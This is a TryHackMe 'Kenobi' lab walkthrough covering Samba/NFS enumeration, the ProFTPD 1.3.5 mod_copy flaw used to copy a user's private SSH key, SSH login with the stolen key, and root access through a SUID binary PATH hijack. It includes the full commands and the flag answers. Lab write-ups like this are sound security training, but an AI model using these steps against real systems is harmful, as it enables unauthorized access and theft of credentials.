4 minutes
THM_Kenobi_Walkthrough
Kenobi THM
performed by: jb-willams
Deploy the vulnerable machine
Scan the machine with nmap, how many ports are open?
- Deploy the Machine and scan it with nmap
nmap -v -p- -sV -sC -T4 -oA nmap/initial 10.10.223.56 && grep -i "open" nmap/initial.nmap | cut -d' ' -f 1 | cut -d'/' -f1 | tee nmap/ports.txt | wc -l
notice, you may get some false positives that will have unknown service
, ignore them
- Answer: Number of ports open:
7
Enumerating Samba for shares
Using the nmap command above, how many shares have been found?
- Using the previous nmap command I found: They ask you to notice the SMB service running and mention that it would be a good idea to enumerate these shares with nmap scripts.
- SMB uses ports
445
139
(usually) - You can enumerate SMB with this nmap command using these scripts
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.223.56
- Answer:
3
Once you’re connected, list the files on the share. What is the file can you see?
- The scripts show an
anonymous
share. - Attempt to login to the share with blank password.
smbclient //10.10.223.56/anonymous
- To list the files run the
ls
cmd. - While logged in you can download that file running:
get log.txt
- Or you can download recurisvely while not logged in with:
smbget -R smb://10.10.223.56/anonymous
- Answer:
log.txt
What port is FTP runningon?
- Reading the
log.txt
file the FTP service is running on: - Answer:
21
What mount can we see?
- Going back to our nmap scan for open ports we can see that there is RPC running on port 111(in this case) and we can enumerate that service more with nmap.
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.223.56
- Answer:
/var
Gain initial access with ProFtpd
What is the version?
- With
netcat
you can do a quick connect to find the version of ProFTPD running.
nc 10.10.223.56 21
- Answer:
1.3.5
How many exploits are there for the ProFTPD running?
- You can easily check for basice vulnerabilities with
searchsploit
.
searchsploit proftpd 1.3.5
- Answer:
4
What is Kenobi’s user flag (/home/kenobi/user.txt)?
- We see from searchsploit there is a
mod_copy
vulnerability ins ProFTPD. - And from
log.txt
we know there is an ssh key created for thekenobi
user. - So, lets try to copy
kenobi
’s ssh key to the mountable directory.
nc 10.10.223.56 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.223.56]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
^C
- Earlier, with the scan on port 111, we saw that there is a mount point at
/var
and we just moved the ssh key to that directory tree. - Lets mount the
/var
dir to our machine
mkdir /mnt/kenobiNFS
mount 10.10.223.56:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
- And now we can traverse to
/mnt/kenobiNFS
and/or just copy it, and get kenobi’s private key to login as that user.
cp /mnt/kenobiNFS/tmp/id_rsa .
sudo chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.223.56
- Answer: d0b0f3f53b6caa532a83915e19224899
Privilege Escalation with Path Variable Manipulation
What file looks particularly out of the ordinary?
- They let you know some info about SUID’s and that they can be used to escalate priveleges.
- Using their command try to find the file that looks out of the ordinary. (I have used my own machine as reference several times)
find / -perm -u=s -type f 2>/dev/null
- Answer:
/usr/bin/menu
Run the binary, how many options appear?
- Answer:
3
What is the root flag (/root/root.txt)?
-
Looking at the binary
ls -la /usr/bin/menu
shows that it is owned byroot
and could run with root priveleges. -
Running
strings /usr/bin/menu
shows that the commands are not being ran using the absolute path, so we may be able to exploit this. -
We are going copy
/bin/bash
to/tmp/curl
then modify the$PATH
to read our binary first.
echo /bin/bash > /tmp/curl
chmod 777 /tmp/curl
export PATH=/tmp:$PATH
-
Then run
/usr/bin/menu
again and chose option1
that uses curl and it will place you in a priveleged bash shell. -
Answer:
177b3cd8562289f37382721c28381f02
written and performed by jb-williams - github
linux pentest smb SUID scanning ftp searchsploit tryhackme kenobi walkthrough
656 Words
2023-04-12 12:25